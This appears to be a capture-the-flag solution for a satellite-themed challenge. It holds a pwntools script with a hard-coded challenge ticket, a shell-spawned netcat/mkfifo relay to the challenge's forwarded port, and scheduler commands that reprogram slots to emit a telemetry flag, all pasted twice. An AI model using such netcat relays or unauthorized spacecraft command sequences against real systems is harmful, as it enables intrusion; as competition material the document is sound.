pdelteil · June 1, 2020 07:03
diff --git a/commands b/commands
 # Disable Slot 1
 cmd("KIT_SCH CFG_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 6, CCSDS_FUNCCODE 4, CCSDS_CHECKSUM 0, SLOT 1, ACTIVITY 0, CONFIG 0")

 # Reprogram Slot 0, Activity 0 to call KIT_TO_TLM_FLAG_MID.
 cmd("KIT_SCH LOAD_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 13, CCSDS_FUNCCODE 5, CCSDS_CHECKSUM 0, SLOT 0, ACTIVITY 0, CONFIG 1, FREQ 1, OFFSET 0, MSG_TBL_IDX 42")

 # Reprogram Slot 1, Activity 0 to call KIT_TO_TLM_FLAG_MID.
 cmd("KIT_SCH LOAD_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 13, CCSDS_FUNCCODE 5, CCSDS_CHECKSUM 0, SLOT 0, ACTIVITY 0, CONFIG 1, FREQ 1, OFFSET 0, MSG_TBL_IDX 42")

 # Enable Telemetry
 cmd("KIT_TO ENABLE_TELEMETRY with CCSDS_STREAMID 6272, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 17, CCSDS_FUNCCODE 7, CCSDS_CHECKSUM 0, IP_ADDR '127.0.0.1'")

 # Reset Counters on SCH.
 cmd("KIT_SCH RESET_CTRS with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 1, CCSDS_FUNCCODE 1, CCSDS_CHECKSUM 0")
diff --git a/tunnel.py b/tunnel.py
 import sys
 import binascii

 from pwn import *

 TICKET = "ticket{whiskey91484kilo:GLbq8J4O7lHW0Cc9DxjzMDiwym7-atHNlMLVrqE8IFwORWHbV5ZM_O6DTbdzvsfOdw}"

 r = remote("calendar.satellitesabove.me", 5061)
 r.recvline()  # ticket pls
 r.sendline(TICKET)

 # Get the forwarding address.
 r.recvuntil('tcp:')

 # This is super unsafe :D
 forwarder = str(r.recvline(), 'utf-8')
 hostname = forwarder.split(':')[0].strip()
 port = forwarder.split(':')[1].strip()

 log.info("Starting tunnel on 8888 to {0} {1}".format(hostname, port))
 subprocess.Popen(["mkfifo", "tunnel"])
 subprocess.Popen(
    [
        "sh", "-c", "nc -l -k -p 8888 <tunnel | nc {0} {1} >tunnel".format(
            hostname, port
        )
    ]
 )

 # Loop and print logs.
 try:
    while True:
        print(str(r.recvline(), 'utf-8'))
 except:
    log.error("Socket died :(")
	# Disable Slot 1
	cmd("KIT_SCH CFG_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 6, CCSDS_FUNCCODE 4, CCSDS_CHECKSUM 0, SLOT 1, ACTIVITY 0, CONFIG 0")

	# Reprogram Slot 0, Activity 0 to call KIT_TO_TLM_FLAG_MID.
	cmd("KIT_SCH LOAD_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 13, CCSDS_FUNCCODE 5, CCSDS_CHECKSUM 0, SLOT 0, ACTIVITY 0, CONFIG 1, FREQ 1, OFFSET 0, MSG_TBL_IDX 42")

	# Reprogram Slot 1, Activity 0 to call KIT_TO_TLM_FLAG_MID.
	cmd("KIT_SCH LOAD_SCH_ENTRY with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 13, CCSDS_FUNCCODE 5, CCSDS_CHECKSUM 0, SLOT 0, ACTIVITY 0, CONFIG 1, FREQ 1, OFFSET 0, MSG_TBL_IDX 42")

	# Enable Telemetry
	cmd("KIT_TO ENABLE_TELEMETRY with CCSDS_STREAMID 6272, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 17, CCSDS_FUNCCODE 7, CCSDS_CHECKSUM 0, IP_ADDR '127.0.0.1'")

	# Reset Counters on SCH.
	cmd("KIT_SCH RESET_CTRS with CCSDS_STREAMID 6293, CCSDS_SEQUENCE 49152, CCSDS_LENGTH 1, CCSDS_FUNCCODE 1, CCSDS_CHECKSUM 0")
	import sys
	import binascii

	from pwn import *

	TICKET = "ticket{whiskey91484kilo:GLbq8J4O7lHW0Cc9DxjzMDiwym7-atHNlMLVrqE8IFwORWHbV5ZM_O6DTbdzvsfOdw}"

	r = remote("calendar.satellitesabove.me", 5061)
	r.recvline() # ticket pls
	r.sendline(TICKET)

	# Get the forwarding address.
	r.recvuntil('tcp:')

	# This is super unsafe :D
	forwarder = str(r.recvline(), 'utf-8')
	hostname = forwarder.split(':')[0].strip()
	port = forwarder.split(':')[1].strip()

	log.info("Starting tunnel on 8888 to {0} {1}".format(hostname, port))
	subprocess.Popen(["mkfifo", "tunnel"])
	subprocess.Popen(
	[
	"sh", "-c", "nc -l -k -p 8888 <tunnel \| nc {0} {1} >tunnel".format(
	hostname, port
	)
	]
	)

	# Loop and print logs.
	try:
	while True:
	print(str(r.recvline(), 'utf-8'))
	except:
	log.error("Socket died :(")